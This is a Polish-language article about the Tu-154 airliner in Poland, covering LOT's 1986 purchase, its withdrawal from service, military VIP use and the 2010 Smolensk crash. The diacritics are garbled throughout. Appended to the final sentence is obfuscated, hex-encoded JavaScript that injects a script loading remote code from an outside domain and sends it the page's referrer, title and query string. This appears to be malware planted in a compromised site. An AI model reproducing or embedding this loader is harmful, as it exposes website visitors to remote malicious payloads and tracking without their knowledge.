Tupolew pod polskA� banderA�

Gdy pod koniec lat 60-tych XX wieku pokazano pierwsze prototypy Tu-154, zebraA� on niezwykle pozytywne recenzje. Uznano go nie tylko za nowoczesnA� konstrukcjA�, ale takA?e i ciekawA� technicznie. W zwiA�zku z tym, samoloty tego typu cieszyA�y siA� ogromnA� popularnoA�ciA�. Przez caA�y okres produkcji stworzono niemalA?e tysiA�c sztuk. Mimo iA? wiA�kszoA�A� z nich pozostaA�a w Rosji, to Tupolewa 154 moA?na byA�o spotkaA� chociaA?by w CzechosA�owacji, NRD, BuA�garii, na WA�grzech, czy Ukrainie. Nie inaczej byA�o takA?e i w przypadku rynku Polskiego.

Polacy dosyA� dA�ugo zwlekali z zamA?wieniem Tu-154. Pierwsze sztuki Polskie Linie Lotnicze LOT zakupiA�y dopiero w roku 1986. ZamA?wienie opiewaA�o na czternaA�cie egzemplarzy. KaA?dy z nich miaA� zasiliA� transport osobowy na krA?tkich i A�rednich dystansach. ZamA?wienie byA�o realizowane stopniowo, a kolejne maszyny trafiaA�y do polskiego przewoA?nika na przestrzeni kilkunastu miesiA�cy.

Tupolewy naleA?A�ce do LOTu nie miaA�y jednak za duA?o szczA�A�cia. JuA? w roku 1989 caA�kowicie zmieniaA�a siA� polityka flotowa przewoA?nika. Kierownictwo podjA�A�o wtedy decyzjA� o kupowaniu wyA�A�cznie samolotA?w zachodnich. Tym samym zablokowano wszelakie moA?liwoA�ci skA�adania kolejnych zamA?wieA� w zakA�adach Tupolewa. Co wiA�cej, na uciA�ciu zakupA?w za wschodniA� granicA� nie skoA�czyA�o siA�. Kolejna decyzja mA?wiA�a bowiem o wycofaniu radzieckich samolotA?w z uA?ytku. Ostatni lot rejsowy Tu-154 miaA� miejsce w roku 1993. Ostatni czarter odbyA� siA� juA? trzy lata pA?A?niej.

Wycofywanie TupolewA?w z uA?ytku cywilnego nasunA�A�o pewien pomysA� najwyA?szym wA�adzom paA�stwowym. Mianowicie postanowiA�y one przejA�A� dwie maszyny i wcieliA� je do wojska. W ten sposA?b miano uzyskaA� flotA�, ktA?ra zajA�A�aby siA� przelotami z najwaA?niejszymi osobami w paA�stwie. Pierwszy statek powietrzny zostaA� przejA�ty przez wojsko w roku 1990. Kolejny trafiA� do armii cztery lata pA?A?niej.

Przez kolejne kilkanaA�cie lat dwa Tu-154 sA�uA?yA�y polskim VIPom. Sytuacja zmieniA�a siA� dopiero 10 kwietnia 2010 roku, kiedy to miaA� miejsce feralny lot Warszawa – SmoleA�sk. Samolot z Prezydentem RP na pokA�adzie rozbiA� siA� podczas podchodzenia do lA�dowania.var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}